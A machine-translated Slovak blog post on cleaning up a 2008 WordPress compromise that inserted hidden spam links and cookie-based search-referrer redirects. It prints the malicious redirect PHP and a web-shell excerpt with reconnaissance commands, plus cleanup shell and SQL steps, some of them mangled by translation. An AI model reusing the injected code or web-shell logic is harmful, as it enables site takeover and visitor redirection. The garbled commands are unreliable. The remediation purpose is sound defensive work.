V poslednom mesiaci, som dostal varovanie vírus v blogu z niektorých návštevníkov. Pôvodne som ignoroval varovanie, pretože som nainštaloval docela dobrý antivírusový program (Kaspersky AV 2009) A aj blog na dlhú dobu, nikdy som dostal vírus alert (dávno .. Videl som niečo podozrivého, že prvý obnovovací zmizol. Konečne ...).
Pomaly začali prejavovať veľké rozdiely návštevnostiPo ktorá nedávno plynule znížila návštevnosť a začal byť stále viac a viac ľudí mi povedať, že stealthsettings. S to je nakazené vírusmi. Včera som dostal od niekoho screenshot urobiť, keď antivírus zablokovanie scenár z stealthsettings.com:Trojan-Clicker.HTML.IFrame.gr. Bolo to dosť presvedčivé na mňa, tak som dal všetky zdroje prehľadávané. Prvá myšlienka, ktorá ma napadla, bola k tomu upgrade posledný WordPress (2.5.1), ale nie pred odstránením všetkých súborov v starom skripte WordPress a urobiť zálohovanie databázy. Tento postup nefungoval a pravdepodobne mi dlho trvalo, kým som zistil, kde sa chyba nachádza, ak mi to nepovedala. Eugen v diskusii nad kávou, našiel súvislosť Google a že by bolo dobré ho vidieť.
MyDigitalLife.info, uverejnil článok s názvom: „WordPress Hack: Obnovte a opravte Google a vyhľadávací nástroj alebo žiadny prenos súborov cookie presmerovaný na stránky Your-Needs.info, AnyResults.Net, Golden-Info.net a ďalšie nelegálne stránky"To je koniec nite som potreboval.
Je to o využiť de WordPress založené na cookiesČo myslím, že je veľmi zložité a urobil knihu. Natoľko šikovný, aby sa SQL Injection Databáza blog, vytvoriť neviditeľný užívateľa jednoduché rutinné kontrola Informačný panel->užívatelia, Skontrolujte server adresáre a súbory "nahrávacie" (to chmod 777), vyhľadávať a do vykonať Súbory s oprávneniami skupiny alebo koreň. Ja neviem, kto zneužiť meno a vidieť, že existuje len málo napísané články o ňom, a to napriek skutočnosti, že mnoho blogov sú infikované, vrátane Rumunska. Ok ... Budem sa snažiť, aby sa pokúsili vysvetliť univerzálnosti o vírusu.
Čo je to vírus?
Najprv vložte zdroje stránky na blogy, odkazy neviditeľné pre návštevníkov, ale viditeľný a doštičkové pre vyhľadávače, najmä Google. Takto prevod stránky Page Rank uvedené útočníkom. Po druhé je vložený ďalší Presmerovanie kód URL pre návštevníkov z Google, Live, Yahoo, ... alebo RSS čítačka a nie miesto v sušienka, antivírus detekuje presmerovanie as Trojan-Clicker.HTML.
Príznaky:
Znížená masívne návštevnostiNajmä na blogy, kde väčšina návštevníkov prichádza z Google.
Identifikácia: (tu sa problém komplikuje pre tých, ktorí nevedia veľa o phpmyadmin, php a linux)
LA. VAROVANIE! Najprv vytvoriť záložnú databázu!
1. Skontrolujte zdrojové súbory index.php, header.php, footer.php, Téma tohto blogu a uvidíme, či tam je kód, ktorý používa šifrovanie base64 alebo obsahuje „if ($ ser ==“ 1? && sizeof ($ _ COOKIE) == 0) ”v tvare:
<?php
$seref=array(”google”,”msn”,”live”,”altavista”,
”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref)
if(strpos(strtolower
($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; }
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit;
}?>... Alebo tak niečo. Zmazať tento kód!
Kliknite na obrázok ...
Na snímke obrazovky vyššie som omylom vybral a „ „. Tento kód musí zostať.
2. Použitie phpMyAdmin a ísť do databázovej tabuľky wp_usersTam, kde kontrola nie je užívateľské meno vytvorené na 00:00:00 0000-00-00 (Možno v oblasti user_login písať "WordPress“. Zapíšte si ID tohto používateľa (pole ID) a potom ho vymažte.
Kliknite na obrázok ...
* Zelená linka by mala byť odstránená, a udržal si ID. V prípade ospalýBol ID = 8 .
3. Prejsť na tabuľky wp_usermeta, Kde sa nachádza a utrieť linky pre ID (ak pole USER_ID ID hodnota je odstránený).
4. V tabuľke wp_optionChoď active_plugins a uvidíte, čo plugin je povolené podozrivého. To môže byť použitý ako zakončenie _old.giff, _old.pngg, _old.jpeg, _new.php.giffatď. kombinácie rozšírení rozšírených obrázkov o _old a _new.
SELECT * FROM wp_options WHERE option_name = 'active_plugins'Odstrániť tento doplnok, potom prejsť na blog -> Dashboard -> Pluginy, kde deaktivujete a aktivujete akýkoľvek doplnok.
Kliknite na obrázok pre zobrazenie je zdá active_plugins vírus súbor.
Sledujte cestu na FTP alebo SSH, je uvedené v active_plugins a zmazať súbor zo servera.
5. Aj v phpMyAdmin, v tabuľke wp_option, Nájsť a odstrániť riadok obsahujúci "rss_f541b3abd05e7962fcab37737f40fad8"A"internal_links_cache ".
V internal_links_cache, ponúkol šifrované spamu odkazy, ktoré sa zobrazujú v blogu kód Google Adsšije, Hacker.
6. Odporúča sa, aby zmeniť heslo Blog a prihlásenie odobrať všetky podozrivé userele. Inovujte na najnovšiu verziu WordPress a nastavte blog tak, aby už neumožňoval registráciu nových používateľov. Neexistuje žiadna strata ... môže tiež komentovať neobývaný.
Vyššie som sa pokúsil trochu vysvetliť, čo robiť v takejto situácii, vyčistiť blog od tohto vírusu. Problém je oveľa vážnejší, ako sa zdá, a ani zďaleka nie je vyriešený, pretože sa používajú bezpečnostné zraniteľnosti hosting webový server, ktorý je blog.
Ako prvé opatrenie bezpečnosti, s prístupom SSH, Urobiť nejaké kontroly na serveri, či sú súbory ako * _old * a * _New. * S koncovkami.GIFF,. Jpeg,. Pngg,. Jpgg. Tieto súbory musia byť odstránené. Ak premenujete súbor, napríklad. top_right_old.giff in top_right_old.phpVidíme, že súbor je presne kód zneužitie servera.
Niekoľko užitočných pokynov na kontrolu, čistenie a zabezpečenie servera. (cez SSH)
1. cd / tmp a skontrolujte, či sú k dispozícii adresáre ako tmpVFlma alebo iný kombinácia asemenatoare meno a odstrániť ju. Pozri obrázok nižšie, dve také zložky, ktoré sa mi:
rm-rf foldername
2. Skontrolujte a odstráňte (zmeňte chmod-ul) pokiaľ možno priečinky s atribútmi chmod 777
nájsť všetky zapisovateľné súbory v aktuálnom adresári: Nájsť. -Type f-perm-2-ls
nájsť všetky zapisovateľné adresára v aktuálnej dir: Nájsť. -Type d-perm-2-ls
nájsť všetky zapisovateľné adresáre a súbory v aktuálnom adresári: Nájsť. -Perm-2-ls
3. Hľadáte podozrivých súborov na serveri.
find . -name "*_new.php*"
find . -name "*_old.php*"
find . -name "*.jpgg"
find . -name "*_giff"
find . -name "*_pngg"4, VAROVANIE! súbory, ktoré si stanovili trochu Suid si SGID. Tieto súbory spustiť s právami užívateľa (skupina), alebo koreň, nie užívateľ, ktorý spustiť súbor. Tieto súbory môžu viesť k koreňovej kompromisu, ak sa jeho bezpečnostné problémy. Ak nechcete používať suid a SGID súbory s trochou, vykonajte "chmod 0 " je, alebo odinštalovať balíček obsahujúci im.
Exploit obsahuje niekde v zdroji ...:
if(!$safe_mode){
if($os_type == 'nix'){
$os .= execute('sysctl -n kern.ostype');
$os .= execute('sysctl -n kern.osrelease');
$os .= execute('sysctl -n kernel.ostype');
$os .= execute('sysctl -n kernel.osrelease');
if(empty($user)) $user = execute('id');
$aliases = array(
'' => '',
'find suid files'=>'find / -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'show opened ports'=>'netstat -an | grep -i listen',
);
}else{
$os_name .= execute('ver');
$user .= execute('echo %username%');
$aliases = array(
'' => '',
'show runing services' => 'net start',
'show process list' => 'tasklist'
);
}Zistí, že spôsob, ako ... v podstate narušenia bezpečnosti. Prístavy otvorte adresár "zápis" a skupinové spustenie výsady súborov / koreň.
Späť s viac ...
Niektoré infikované blogy: www.blegoo.com, www.visurat.ro,
fulgerica.com, denisuca.com, www.ecostin.com,
www.razvanmatasel.ro,
blog.hrmarket.ro, www.nitza.ro,
motocykle.motomag.ro,
emi.brainient.com, www.picsel.ro,
www.mihaidragan.ro/kindablog/,
krumel.seo-point.com, www.itex.ro/blog,
www.radiology.ro,
www.dipse.ro/inut/,
www.vinul.ro/blog/, www.damaideparte.ro,
dragos.roua.ro, www.artistul.ro/blog/,
www.mirabilismedia.ro/blog, blog.einvest.ro
... A zoznam pokračuje ... veľa.
To, či je blog infikovaný, môžete skontrolovať pomocou vyhľadávacieho nástroja Google. kopírovať vložiť:
Miesto: www.blegoo.com kúpiť
Dobrú noc a dobrú prácu;) Čoskoro si myslím, že Eugen príde so správami, na prevezibil.imprevizibil.com
BRB :)
POZOR! Zmena témy WordPress alebo inovovať na WordPress 2.5.1, NIE JE riešením, ako sa zbaviť tohto vírusu.
